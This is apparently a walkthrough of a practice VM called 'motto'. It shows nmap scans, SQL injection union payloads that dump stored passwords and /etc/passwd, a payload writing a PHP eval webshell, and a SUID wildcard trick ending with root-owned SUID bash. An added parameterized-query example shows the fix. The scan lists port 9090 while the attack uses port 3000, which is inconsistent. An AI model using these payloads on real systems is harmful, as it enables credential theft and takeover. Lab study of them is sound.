```
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.874 seconds (136.61 hosts/sec). 3 responded
```
Port scanning
```
┌──(root㉿kali)-[/home/kali]
└─# nmap -p- 192.168.56.151
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 22:35 EDT
Nmap scan report for 192.168.56.151
Host is up (0.00068s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9090/tcp open  zeus-admin
MAC Address: 08:00:27:38:7E:82 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 15.24 seconds
```
Port 80
Port 80 only serves a small front-end game; there is no entry point there.
Port 3000
Register an account testtest:testtest and log in.
Write a Motto, then click "view my Motto": the Motto you wrote is displayed.
If you change the nickname to ta0 and view the Motto again, ta0's Motto is displayed.
Change it to ta0' and nothing is displayed.
Change it to ta0' -- a and the Motto information is displayed again.
So the nickname is spliced into the query: there is SQL injection.
Option 1
ta0' union select 1,2, table_name from information_schema.tables where table_schema=database(); -- a
Dump the table names.
ta0' union select 1,2, column_name from information_schema.columns where table_schema=database() and table_name='register_infos'; -- a
Dump the column names.
ta0' union select 1,username,password from register_infos; -- a
Look at the registration info.
This gives us RedBean's password.
We can also use
ta0' union select 1,2,load_file('/etc/passwd'); -- a
to look at the system users.
There is a redbean user.
The password we dumped is the redbean user's password.
Option 2
Alternatively, use ta1' union select 1,1,'<?php @eval($_POST[1]);?>' into outfile '/var/www/html/config.php'; -- a to write a webshell into the web service on port 80.
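To show the defender's side of the behaviour observed above, here is an added example (not code from the original writeup or from the target application) that reproduces the nickname-based Motto lookup against an in-memory SQLite database: the spliced-string query reacts to ta0', ta0' -- a and the union payload exactly as the page describes, while the parameterized version treats the same inputs as plain nicknames. The mottos table and its column names are assumptions, as are all sample rows; the page's payloads are reused without the trailing semicolon because sqlite3's execute() runs one statement at a time.

```python
import sqlite3


def setup_db():
    # Constructed stand-in for the app's database. register_infos/username/password
    # come from the writeup; the mottos table and the sample rows are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE mottos (id INTEGER, nickname TEXT, motto TEXT);
        INSERT INTO mottos VALUES (1, 'ta0', 'stay hungry');
        INSERT INTO mottos VALUES (2, 'testtest', 'hello');
        CREATE TABLE register_infos (username TEXT, password TEXT);
        INSERT INTO register_infos VALUES ('RedBean', 'demo-password-1');
        INSERT INTO register_infos VALUES ('testtest', 'testtest');
    """)
    return db


def lookup_motto_vulnerable(db, nickname):
    # The pattern the writeup exploits: the nickname is spliced into the SQL text,
    # so a quote breaks the statement, a comment repairs it, and a UNION appends
    # rows from any other table into the columns the page displays.
    sql = f"SELECT id, nickname, motto FROM mottos WHERE nickname = '{nickname}'"
    try:
        return [(row[1], row[2]) for row in db.execute(sql)]
    except sqlite3.Error:
        return []  # the broken statement shows nothing, as seen with ta0'


def lookup_motto_fixed(db, nickname):
    # Hardened form: the nickname is bound as a parameter and is never parsed as
    # SQL, so quotes, comments and UNION keywords are just characters to match.
    sql = "SELECT id, nickname, motto FROM mottos WHERE nickname = ?"
    return [(row[1], row[2]) for row in db.execute(sql, (nickname,))]


# The inputs the writeup tried, minus the trailing semicolon (see lead-in).
PAYLOADS = {
    "plain": "ta0",
    "quote": "ta0'",
    "comment": "ta0' -- a",
    "union": "ta0' union select 1,username,password from register_infos -- a",
}

if __name__ == "__main__":
    conn = setup_db()
    for name, value in PAYLOADS.items():
        print(name, "vulnerable:", lookup_motto_vulnerable(conn, value))
        print(name, "fixed:     ", lookup_motto_fixed(conn, value))
```

Running it prints the leaked register_infos rows only for the vulnerable lookup; the fixed lookup returns rows solely for the literal nickname ta0.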
II. Privilege escalation
We can SSH straight in as the redbean user.
Using find / -perm -u=s -type f 2>/dev/null we find a SUID binary, /opt/run_newsh.
Excerpt of /opt/new.sh, the script it runs:

```bash
echo -e "\033[1;34m[INFO]\033[0m Initializing environment checks:"
for step in A B C; do
    echo -e "\033[1;33m ● Module ${step} status: OK (ver $(($RANDOM%5+1)).$(($RANDOM%20)).$(($RANDOM%500)))\033[0m"
    sleep 0.12
done

echo -e "\033[1;34m[INFO]\033[0m Running diagnostic sequence:"
for step in {1..3}; do
    echo -e "\033[1;35m → Executing test ${step} of 3\033[0m"
    sleep 0.2
done

for ((i=WAIT_TIME; i>=0; i--)); do
    case $((i%4)) in
        0) COL="34" ;;  # blue
        1) COL="32" ;;  # green
        2) COL="31" ;;  # red
        3) COL="36" ;;  # cyan
    esac

    case $((i%2)) in
        0) echo -e "\033[1;${COL}m>> Waiting T-${i} seconds...\033[0m" ;;
        1) echo -e "\033[1;${COL}m>> Countdown: ${i}\033[0m" ;;
    esac

    [ $i -gt 0 ] && sleep 1
done

RESULTS=( "Diagnostics complete." "All systems nominal." "No errors detected." "System stable." )
FINAL_MSG=${RESULTS[$RANDOM % ${#RESULTS[@]}]}
echo -e "\033[1;32m${FINAL_MSG}\033[0m"
echo -e "\033[1;34mThank you for using the system monitor.\033[0m"
```
```
redbean@motto:~$ mkdir test
redbean@motto:~$ touch test/flag
redbean@motto:~$ cd test/
redbean@motto:~/test$ /opt/run_newsh "*"
▓▒░ Loading system diagnostics ░▒▓
[INFO] Initializing environment checks:
 ● Module A status: OK (ver 1.12.97)
 ● Module B status: OK (ver 1.7.137)
 ● Module C status: OK (ver 4.16.344)
Random seed value: 17150
[INFO] Evaluating input parameters...
[INFO] Running diagnostic sequence:
 → Executing test 1 of 3
 → Executing test 2 of 3
 → Executing test 3 of 3
Waiting period: 2 seconds
>> Waiting T-2 seconds...
>> Countdown: 1
>> Waiting T-0 seconds...
All systems nominal.
Thank you for using the system monitor.
[STATS] Summary Report:
Processes checked: 68
/opt/new.sh: line 60: bc: command not found
CPU load average:
Uptime (hours): 83
redbean@motto:~/test$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
redbean@motto:~/test$
```